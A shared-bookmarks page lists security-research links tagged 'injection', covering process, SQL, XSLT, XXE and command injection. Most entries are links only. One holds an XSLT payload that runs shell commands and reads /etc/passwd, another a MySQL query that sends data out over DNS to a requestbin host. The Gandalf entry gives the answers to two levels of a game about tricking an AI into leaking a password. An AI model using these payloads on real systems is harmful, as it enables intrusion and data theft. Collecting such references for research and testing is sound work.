Search: [injection] - Shared Bookmarks

Links per page: 20 50 100

◄Older

page 1 / 2

27 results tagged injection x

ProcessInjectionTechniques | This comprehensive process injection series is crafted for cybersecurity enthusiasts, researchers, and professionals who aim to stay at the forefront of the field. It serves as a central repository of knowledge, offering in-depth exploration of various process injection techniques used by adversaries.
September 15, 2024 at 3:09:11 PM UTC * - permalink -

- https://offensive-panda.github.io/ProcessInjectionTechniques/

process injection
GTFOArgs
May 26, 2023 at 10:59:59 AM UTC - permalink -

- https://gtfoargs.github.io/

cmd injection command args
Gandalf | Lakera - Prompt Injection

lvl 7: DEBUTANTE
lvl 8: VELODROME
May 22, 2023 at 11:07:08 AM UTC - permalink -

- https://gandalf.lakera.ai/#

prompt injection llm ia
gh0x0st/wanderer: An open-source process injection enumeration tool written in C#
December 17, 2022 at 8:45:49 PM UTC - permalink -

- https://github.com/gh0x0st/wanderer

process injection osep
SQL injection: 9 ways to bypass Web Application Firewall • Penetration Testing
April 19, 2022 at 3:25:45 PM UTC - permalink -

- https://securityonline.info/sql-injection-9-ways-bypass-web-application-firewall/

sql injection sqli bypass waf
RedTeamOperations/Advanced-Process-Injection-Workshop
February 7, 2022 at 9:17:55 PM UTC - permalink -

- https://github.com/RedTeamOperations/Advanced-Process-Injection-Workshop

injection process red team
Exploiting JNDI Injections in Java | Veracode blog
December 10, 2021 at 2:57:57 PM UTC - permalink -

- https://www.veracode.com/blog/research/exploiting-jndi-injections-java

jndi injection ldap rmi rce
writeups/CVE-2021-26084.md at main · snowyyowl/writeups
October 7, 2021 at 9:31:35 AM UTC - permalink -

- https://github.com/snowyyowl/writeups/blob/main/CVE-2021-26084.md

cve writeup confluence ognl injection
Fortinet FortiWeb OS Command Injection | Rapid7 Blog
August 19, 2021 at 1:48:24 PM UTC - permalink -

- https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/

fortinet rce postauth os command injection fortiweb
Path to Process Injection — Bypass Userland API Hooking | by Seemant Bisht | Nov, 2020 | Medium
November 27, 2020 at 6:58:26 PM UTC * - permalink -

- https://securitytimes.medium.com/path-to-process-injection-bypass-userland-api-hooking-a8a49ae5def6

process injection pe api hooking blog tuto howto
InsertScript: ImageMagick - Shell injection via PDF password
November 23, 2020 at 2:15:09 PM UTC - permalink -

- https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

imagemagick image magick rce pdf shell injection
Advanced MSSQL Injection Tricks – PT SWARM
November 13, 2020 at 3:47:35 PM UTC - permalink -

- https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/

sqli sql mssql injection tricks

The hidden dangers of XSLTProcessor - Remote XSL injection | Acunetix

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
  <script>confirm("We're good");</script>
   <!--
   <xsl:value-of select="php:function('exec','id')"/>
   <xsl:value-of select="php:function(‘passthru’,’ls -la /’)"/>
   <xsl:copy-of select="document('/etc/passwd')"/>
   <xsl:value-of select="php:function('passthru','ls -la /')"/>
   -->
   <xsl:value-of select="php:function('passthru','ls -la /')"/>

  </xsl:template>
</xsl:stylesheet>

October 16, 2020 at 3:57:50 PM UTC * - permalink -

- https://www.acunetix.com/blog/articles/the-hidden-dangers-of-xsltprocessor-remote-xsl-injection/

xslt injection command execution rce lfi

ayoul3/reflect-pe: Reflectively load PE

https://github.com/FuzzySecurity/Sharp-Suite/tree/master/UrbanBishop
https://rastamouse.me/blog/tikispawn-msbuild/
July 29, 2020 at 2:03:29 PM UTC - permalink -

- https://github.com/ayoul3/reflect-pe

av bypass tikitorch reflect pe injection
markdown-it/xss.txt at master · markdown-it/markdown-it · GitHub
April 15, 2020 at 2:32:48 PM UTC - permalink -

- https://github.com/markdown-it/markdown-it/blob/master/test/fixtures/markdown-it/xss.txt

markdown md injection payloads xss payload
Data Exfiltration via Formula Injection #Part1
April 15, 2020 at 2:32:27 PM UTC - permalink -

- https://www.notsosecure.com/data-exfiltration-formula-injection/

exfiltration formula injection csv hacking payload payloads
Don't open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, ... - Shielder
October 24, 2019 at 10:43:16 PM UTC - permalink -

- https://www.shielder.it/blog/dont-open-that-xml-xxe-to-rce-in-xml-plugins-for-vs-code-eclipse-theia/

xxe xml injection hacking pentest oob outofband dtd
41397-injecting-sqlite-database-based-applications.pdf
May 13, 2019 at 9:27:09 AM UTC - permalink -

- https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf

sqlinjection sql injection payload hacking pentest cheatsheet sqlite
DNS Data exfiltration through SQL injection
```
UNION SELECT LOAD_FILE(concat('\\\\', SELECT version(), '.35bb69cb2c1eeda31ab8.d.requestbin.net'));
```
May 9, 2019 at 1:34:22 PM UTC - permalink -

- https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf

sql injection hacking pentest out of band out-of-band load_file load file dns request.bin data exfiltration
The SQL Injection Knowledge Base
May 7, 2019 at 10:49:29 AM UTC - permalink -

- https://websec.ca/kb/sql_injection

sql injection cheatsheet hacking pentest

Links per page: 20 50 100

◄Older

page 1 / 2